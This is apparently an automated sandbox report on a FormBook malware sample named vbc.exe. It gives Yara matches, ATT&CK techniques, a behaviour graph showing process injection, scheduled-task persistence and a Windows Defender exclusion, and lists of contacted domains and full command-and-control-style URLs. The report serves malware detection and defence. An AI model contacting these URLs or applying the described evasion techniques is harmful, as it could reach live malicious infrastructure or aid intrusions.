          Yara detected FormBook
          Source: Yara matchFile source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScheduled Task/Job1Scheduled Task/Job1Process Injection512Masquerading1Input Capture1Query Registry1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools11LSASS MemorySecurity Software Discovery221Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSVirtualization/Sandbox Evasion31Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsApplication Window Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing13Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery112Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 518412 Sample: vbc.exe Startdate: 09/11/2021 Architecture: WINDOWS Score: 100 35 www.mattlambert.xyz 2->35 37 www.joy1263.com 2->37 39 7 other IPs or domains 2->39 47 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 9 other signatures 2->53 9 vbc.exe 7 2->9         started        signatures3 process4 file5 31 C:\Users\user\AppData\...\uZlkYhlkeLeaKC.exe, PE32 9->31 dropped 33 C:\Users\user\AppData\Local\...\tmpAA68.tmp, XML 9->33 dropped 59 Uses schtasks.exe or at.exe to add and modify task schedules 9->59 61 Adds a directory exclusion to Windows Defender 9->61 63 Tries to detect virtualization through RDTSC time measurements 9->63 13 vbc.exe 9->13         started        16 powershell.exe 25 9->16         started        18 schtasks.exe 1 9->18         started        signatures6 process7 signatures8 71 Modifies the context of a thread in another process (thread injection) 13->71 73 Maps a DLL or memory area into another process 13->73 75 Sample uses process hollowing technique 13->75 77 Queues an APC in another process (thread injection) 13->77 20 explorer.exe 13->20 injected 24 conhost.exe 16->24         started        26 conhost.exe 18->26         started        process9 dnsIp10 41 www.maikoufarm.com 118.27.122.222, 49815, 80 INTERQGMOInternetIncJP Japan 20->41 43 www.mmj0115.xyz 101.132.116.91, 49821, 80 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 20->43 45 9 other IPs or domains 20->45 55 System process connects to network (likely due to code injection or exploit) 20->55 57 Performs DNS queries to domains with low reputation 20->57 28 help.exe 20->28         started        signatures11 process12 signatures13 65 Modifies the context of a thread in another process (thread injection) 28->65 67 Maps a DLL or memory area into another process 28->67 69 Tries to detect virtualization through RDTSC time measurements 28->69

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLinkDownload
          8.0.vbc.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.0.vbc.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          8.0.vbc.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          SourceDetectionScannerLabelLink
          www.miabellavita.com0%VirustotalBrowse
          mattlambert.xyz4%VirustotalBrowse
          SourceDetectionScannerLabelLink
          www.septemberstockevent200.com/ht08/0%Avira URL Cloudsafe
          http://www.septemberstockevent200.com/ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH0%Avira URL Cloudsafe
          http://www.joye.club/ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH100%Avira URL Cloudphishing
          http://www.maikoufarm.com/ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH0%Avira URL Cloudsafe
          http://www.miabellavita.com/ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH0%Avira URL Cloudsafe
          http://www.mattlambert.xyz/ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH100%Avira URL Cloudphishing
          http://www.sharpstead.com/ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH0%Avira URL Cloudsafe
          http://www.mmj0115.xyz/ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          www.septemberstockevent200.com
          172.67.188.247
          truetrue
            unknown
            www.miabellavita.com
            104.21.4.114
            truetrueunknown
            mattlambert.xyz
            34.102.136.180
            truefalseunknown
            z010-gp-hk-06-75-adfh31.greycdn.net
            103.118.81.108
            truefalse
              unknown
              www.maikoufarm.com
              118.27.122.222
              truetrue
                unknown
                www.sharpstead.com
                44.227.65.245
                truetrue
                  unknown
                  joye.club
                  34.102.136.180
                  truefalse
                    unknown
                    yungbredda.com
                    34.102.136.180
                    truefalse
                      unknown
                      www.mmj0115.xyz
                      101.132.116.91
                      truetrue
                        unknown
                        ghs.googlehosted.com
                        142.250.203.115
                        truefalse
                          unknown
                          www.watermountsteam.top
                          unknown
                          unknowntrue
                            unknown
                            www.joye.club
                            unknown
                            unknowntrue
                              unknown
                              www.yungbredda.com
                              unknown
                              unknowntrue
                                unknown
                                www.leewaysvcs.com
                                unknown
                                unknowntrue
                                  unknown
                                  www.joy1263.com
                                  unknown
                                  unknowntrue
                                    unknown
                                    www.annikadaniel.love
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.mattlambert.xyz
                                      unknown
                                      unknowntrue
                                        unknown
                                        NameMaliciousAntivirus DetectionReputation
                                        www.septemberstockevent200.com/ht08/true
                                        • Avira URL Cloud: safe
                                        low
                                        http://www.septemberstockevent200.com/ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwHtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.joye.club/ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwHfalse
                                        • Avira URL Cloud: phishing
                                        unknown
                                        http://www.maikoufarm.com/ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwHtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.miabellavita.com/ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwHtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.mattlambert.xyz/ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwHfalse
                                        • Avira URL Cloud: phishing
                                        unknown
                                        http://www.sharpstead.com/ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwHtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.mmj0115.xyz/ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwHtrue
                                        • Avira URL Cloud: safe
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 0000000B.00000000.291685186.0000000006870000.00000004.00000001.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmpfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            104.21.4.114
                                            www.miabellavita.comUnited States
                                            13335CLOUDFLARENETUStrue
                                            34.102.136.180
                                            mattlambert.xyzUnited States
                                            15169GOOGLEUSfalse
                                            118.27.122.222
                                            www.maikoufarm.comJapan7506INTERQGMOInternetIncJPtrue
                                            172.67.188.247
                                            www.septemberstockevent200.comUnited States
                                            13335CLOUDFLARENETUStrue
                                            101.132.116.91
                                            www.mmj0115.xyzChina
                                            37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                            44.227.65.245
                                            www.sharpstead.comUnited States
                                            16509AMAZON-02UStrue

                                            General Information

                                            Joe Sandbox Version:34.0.0 Boulder Opal
                                            Analysis ID:518412
                                            Start date:09.11.2021
                                            Start time:12:55:04
                                            Joe Sandbox Product:CloudBasic
                                            Overall analysis duration:0h 10m 45s
                                            Hypervisor based Inspection enabled:false
                                            Report type:light
                                            Sample file name:vbc.exe
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                            Number of analysed new started processes analysed:29
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:1
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • HDC enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Detection:MAL
                                            Classification:mal100.troj.evad.winEXE@10/8@14/6
                                            EGA Information:Failed
                                            HDC Information:
                                            • Successful, ratio: 2.8% (good quality ratio 2.6%)
                                            • Quality average: 75.8%
                                            • Quality standard deviation: 29.3%
                                            HCA Information:
                                            • Successful, ratio: 100%
                                            • Number of executed functions: 0
                                            • Number of non-executed functions: 0
                                            Cookbook Comments:
                                            • Adjust boot time
                                            • Enable AMSI
                                            • Found application associated with file extension: .exe
                                            Warnings:
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                            • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            TimeTypeDescription
                                            12:56:03API Interceptor1x Sleep call for process: vbc.exe modified
                                            12:56:08API Interceptor41x Sleep call for process: powershell.exe modified
                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            118.27.122.222file0_stage3.dllGet hashmaliciousBrowse
                                            • www.nekomediphile.com/n8rn/?p2M=BeS87FoxVkTke2MRb0qima65PDce7tJfTymmK4/q26Kf4LPrWppSbx1BH8kQDaEu6kDG&zFNL=5jK4uHQH-rfXmT
                                            HPMT ORDER LIST.exeGet hashmaliciousBrowse
                                            • www.ch-foster.com/n6be/?a6=2tOAPcEgYTHD567WF8XvxxEvgHLBbJMXTAUhjj7+D0ChXZUXC+Pn67n//wg0XKB52YMX&4hYl=8pPLKztPMLrhEvWP
                                            44.227.65.245Quote request.exeGet hashmaliciousBrowse
                                            • www.dietjakarta.com/s2qi/?TJELpfLP=qOzazkHAVvIGDra8b9OWW7CQPYry4NAftY2oZLUdYfYDTW+xNyVbwU9NOeXebbzy0cbp&lZwxYz=y6AldH-
                                            SAMPLES2.xlsxGet hashmaliciousBrowse
                                            • www.kisah.xyz/sywu/?8p2=USn/s/N3qxIF4+EyQZdH7vYZi5cG3dzFHZRqO94C2q7bkP8vqLkNegTqp14nFiAPIy6Ubg==&3f=0ltDIRtH
                                            Purchase Order-10,000MT.exeGet hashmaliciousBrowse
                                            • www.brunchy.one/z4m5/?8pW8=zNPWEz3pIEHibvS4bsIXDPiznK4rKMrVGAhmY+HWnOPy3ASb809gbr8Dwg2gtflOJLni&gD=-ZfPOL
                                            ITRli68rgq.exeGet hashmaliciousBrowse
                                            • www.innoattic.com/bs8f/?3fKPRDU=gPvbgkUrDAv1uZACg3Tla1oGEdPTt04jzJdg29vz63COe4p03SEL16juZWtXBmvFy2F4&of=9rSLDPtHxj9hfT
                                            NUo71b3C4p.exeGet hashmaliciousBrowse
                                            • www.fleetton.com/fqiq/?08CT3r=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw6EX/prOJZe4&fB8P=4hMPVF78e
                                            November 2021 Update RFQ 3271737.exeGet hashmaliciousBrowse
                                            • www.jadesrc.com/nc26/?SBZL=d3TYBFuVdrdzP8EyjnH49SiPUjZ6Ux+6cUTZqX+JgS7gU0O8rbqz6CXYuXQkXkTXNal/&D48=c2MHtVyHNxCxXp7
                                            QtDfFXiECh.exeGet hashmaliciousBrowse
                                            • www.203040302.xyz/pufi/?4hb=4hixbv&4h=SazsJgrxJuJNqlYiRzL3ozLk5u53xI01dSvrBHbbk0SB79U4uRUkWEJGSj7nxn+KPfiwTyd4PQ==
                                            Invoice #00442811-20211029.2.exeGet hashmaliciousBrowse
                                            • www.indigobunk.com/b4a0/?EJBHHDyP=BfJ5Bx9UPWuRIZP3b2BXXNlSngsTafG3lcH0rf8/gIGUgH6boOVAW06sJRU4KdudULjy&y48=8pnHll3
                                            vbc.exeGet hashmaliciousBrowse
                                            • www.sharpstead.com/ht08/?e4R=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nnwyv5pwOfYu&j2MXQ6=3fH4ADA
                                            Requested Items.xlsxGet hashmaliciousBrowse
                                            • www.magentavar.com/upi8/?B6=q+sSkz7sAwA4yBB5hWVCxKsuYiMLYHWGeaAggxOaMa4Qocc6YFkdsfdinLpG1SJGl/Ax9Q==&1bFX=0dhH
                                            lCFjxhAqu3.exeGet hashmaliciousBrowse
                                            • www.thr33h3ad3ddragon.art/upi8/?vzr=YyCvSGoAtncS4QUVQZyNjC8cIPJnO/XAnIrSRYtWY0buq7vZ6yNDf+1DqJ4JQv1LHvgP&8pm4=_l6t
                                            PO 800A3E4.exeGet hashmaliciousBrowse
                                            • www.analytico-australis.com/c249/?B48dyrUp=M3oufGH8Bm9b66gzFBXlxSE22zEX1ZdvV3sOjxFBFhL2n1u58TbTRysEXKK/l8JgYoT+&oZ=YlPhVdwxfPPXAPX
                                            triage_dropped_file.exeGet hashmaliciousBrowse
                                            • www.fleetton.com/fqiq/?oJE=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw6EX/prOJZe4&u6KLb=Wp6xUr6h5
                                            PO 4910007391 CHANGZHOU.xlsxGet hashmaliciousBrowse
                                            • www.fleetton.com/fqiq/?k2Mtd=0bGdKhdpsjULqrw&i4Z4rjR=3MX+rG6qdMdpgj3vkcjGUKQb8RZ/Wti45jKeFUgZ8Sp9kre80Lf7BBErzfoB75v9CaDIsg==
                                            m9azdNJhg2.exeGet hashmaliciousBrowse
                                            • www.nothernballet.com/scb0/?P0=oJTIyACWMBuXH8n/EzWjLujKpZPXvTg1NdfRIzqIYFKP8QC8fyVAQXGjBdWKl8hRd6mD&xX=8pjHvFr0NV
                                            Copia de pago_pdf.exeGet hashmaliciousBrowse
                                            • www.jadeshelf.com/p4qi/?2d90bV=1bBLMh&X4=p5BmMS75A/JtgYvVfEDbSkCSvpUzgvUEAewD9F+BpXWJwpteyHvtZR0Kels1fz0BLcm1
                                            7ivFMbol8b.exeGet hashmaliciousBrowse
                                            • www.keenflat.com/m0np/?7n6T=A0GTW8QxnP4hPnA&ETJ8pHk=JnbxNM/rTFifoybGWxqKaXuLsTV7lalyqj1QG2sxy/+1c2rYA5SuNyU7nbkA5B+D+0NP
                                            EhB2SUfLy2.exeGet hashmaliciousBrowse
                                            • www.keenflat.com/m0np/?l8=JnbxNM/rTFifoybGWxqKaXuLsTV7lalyqj1QG2sxy/+1c2rYA5SuNyU7nbkqmxOD62FP&YZsPJr=HJEL06c80X
                                            1SGErShR6f.exeGet hashmaliciousBrowse
                                            • www.commentcard.club/9gdg/?-Zy0C=qf3xl6MENRZ21DZ7gzuwiwLEYsFOD+EdiSexsqSt7LhuNUdogHACIO8bybDoj5UhYm+TCOWmJA==&lN=5jot7b-
                                            Peq0Amq9EP.exeGet hashmaliciousBrowse
                                            • www.bittywire.com/qs23/?m6A=hl8hup_P5x&5jOl7vcx=iP0xukhXBAsLs4o+4LAMqW8C7tqrmiTZ/jO8lNLuZc/21gA7KI5zfXAl5NvJFH5jMmYiJAEXuw==
                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            www.sharpstead.comvbc.exeGet hashmaliciousBrowse
                                            • 44.227.65.245
                                            ghs.googlehosted.comP. INVOICE.exeGet hashmaliciousBrowse
                                            • 142.250.203.115
                                            PRODUCT LIST.docGet hashmaliciousBrowse
                                            • 216.58.206.83
                                            uLjkrnawIw.exeGet hashmaliciousBrowse
                                            • 216.58.208.147
                                            f7e1vlOrJP.exeGet hashmaliciousBrowse
                                            • 142.250.185.179
                                            pO3zAA9lwc.exeGet hashmaliciousBrowse
                                            • 142.250.185.211
                                            company business card (2).exeGet hashmaliciousBrowse
                                            • 172.217.168.51
                                            xUKQ7vGCmR.exeGet hashmaliciousBrowse
                                            • 142.250.185.211
                                            jk6CjxfJsQ.exeGet hashmaliciousBrowse
                                            • 142.250.185.211
                                            DHL202038,PDF.exeGet hashmaliciousBrowse
                                            • 142.250.181.243
                                            PCB 102021.EXEGet hashmaliciousBrowse
                                            • 142.250.181.243
                                            AL Bijjar Trading FZC Requirement.xlsxGet hashmaliciousBrowse
                                            • 142.250.181.243
                                            pBFXGQZbY6.exeGet hashmaliciousBrowse
                                            • 142.250.181.243
                                            kHS7OeVw4a.rtfGet hashmaliciousBrowse
                                            • 142.250.181.243
                                            HIC INTERNACIONAL - DOCUMENTS(RFQ20212211).exeGet hashmaliciousBrowse
                                            • 172.217.168.51
                                            shipping Docs.pdf.exeGet hashmaliciousBrowse
                                            • 172.217.168.51
                                            RFQ21116.exeGet hashmaliciousBrowse
                                            • 172.217.168.51
                                            rundll32.exeGet hashmaliciousBrowse
                                            • 142.250.203.115
                                            nf15RFi8vl.exeGet hashmaliciousBrowse
                                            • 142.250.203.115
                                            New Offer to Thalassa Imports nv-sa._200317.xlsx.exeGet hashmaliciousBrowse
                                            • 142.250.203.115
                                            DHL_Delivery_Confirmation.exeGet hashmaliciousBrowse
                                            • 142.250.203.115
                                            www.miabellavita.comvbc.exeGet hashmaliciousBrowse
                                            • 172.67.132.7
                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            CLOUDFLARENETUSVergi #U00f6deme faturas#U0131 9 Kas#U0131m 2021 Sal#U0131,pdf.exeGet hashmaliciousBrowse
                                            • 172.67.217.17
                                            REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                            • 172.67.199.195
                                            uCkIzRN4ZzUIzCY.exeGet hashmaliciousBrowse
                                            • 104.21.42.115
                                            kA1GNOTJ2VgnL02.exeGet hashmaliciousBrowse
                                            • 172.67.217.39
                                            setup_installer.exeGet hashmaliciousBrowse
                                            • 172.67.176.199
                                            TF -11082148.exeGet hashmaliciousBrowse
                                            • 104.17.207.37
                                            Proforma Invoice, New order.exeGet hashmaliciousBrowse
                                            • 162.159.129.233
                                            PI 01KSD-AB2021.exeGet hashmaliciousBrowse
                                            • 162.159.133.233
                                            TqNOgkfVVu.exeGet hashmaliciousBrowse
                                            • 162.159.133.233
                                            Halkbank_Ekstre_20211108_073719_486930.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            ExportUSA Corp RFQ 6000567507.docGet hashmaliciousBrowse
                                            • 23.227.38.74
                                            CB7D321954760DE22CCBF59ECE43D94E503350B18203D.exeGet hashmaliciousBrowse
                                            • 172.67.128.223
                                            Halkbank_Ekstre_20211108_073719_486930.pdf.exeGet hashmaliciousBrowse
                                            • 104.21.19.200
                                            tanglebot.apkGet hashmaliciousBrowse
                                            • 172.67.136.207
                                            vaeSTdfo17.exeGet hashmaliciousBrowse
                                            • 162.159.134.233
                                            D1F610AF3C46FFF6C857BE0136C696604EB8E7466B4A7.exeGet hashmaliciousBrowse
                                            • 104.21.6.12
                                            F1F6AEEE9A42004E68765A83E9CBD51BC878A0AFD7C80.exeGet hashmaliciousBrowse
                                            • 104.21.6.12
                                            zJam66tNHE0o5Ai.exeGet hashmaliciousBrowse
                                            • 104.21.18.247
                                            com.sibche.aspardproject.app.apkGet hashmaliciousBrowse
                                            • 104.18.29.147
                                            ATT00002.htmlGet hashmaliciousBrowse
                                            • 104.16.126.175
                                            INTERQGMOInternetIncJPQuote request.exeGet hashmaliciousBrowse
                                            • 118.27.122.150
                                            Purchase Order - 10,000MT.exeGet hashmaliciousBrowse
                                            • 118.27.122.221
                                            044b.pdf.exeGet hashmaliciousBrowse
                                            • 163.44.185.185
                                            jVjGBmjH6I.exeGet hashmaliciousBrowse
                                            • 157.7.107.193
                                            U3iFi37tNT.exeGet hashmaliciousBrowse
                                            • 118.27.122.216
                                            PdEfGHtczV.exeGet hashmaliciousBrowse
                                            • 157.7.44.214
                                            v7KGQZ70fj.exeGet hashmaliciousBrowse
                                            • 157.7.107.193
                                            ITRli68rgq.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            4Z5YpFMKR0.exeGet hashmaliciousBrowse
                                            • 118.27.122.216
                                            ja71FJcG4X.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            Jrc9iR2XxH.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            Purchase Order-10,000MT.exeGet hashmaliciousBrowse
                                            • 118.27.122.221
                                            iSBX2z1os7.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            8PRjJeUifBGet hashmaliciousBrowse
                                            • 133.130.112.159
                                            fdnVx1v1hc.exeGet hashmaliciousBrowse
                                            • 157.7.107.193
                                            mxHkqAIYT0Get hashmaliciousBrowse
                                            • 118.27.80.208
                                            NCh22JHZDm.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            Draft shipping docs CI+PL_pdf.exeGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            SHIPPPING-DOC.xlsxGet hashmaliciousBrowse
                                            • 150.95.255.38
                                            AA9FF4E33F61DD2FC164A21D0A53397F19B7F9C64D786.exeGet hashmaliciousBrowse
                                            • 157.7.144.96
                                            No context
                                            No context
                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\vbc.exe.log
                                            Process:C:\Users\user\Desktop\vbc.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):1216
                                            Entropy (8bit):5.355304211458859
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                            MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                            SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                            SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                            SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                            Malicious:false
                                            Reputation:high, very likely benign file
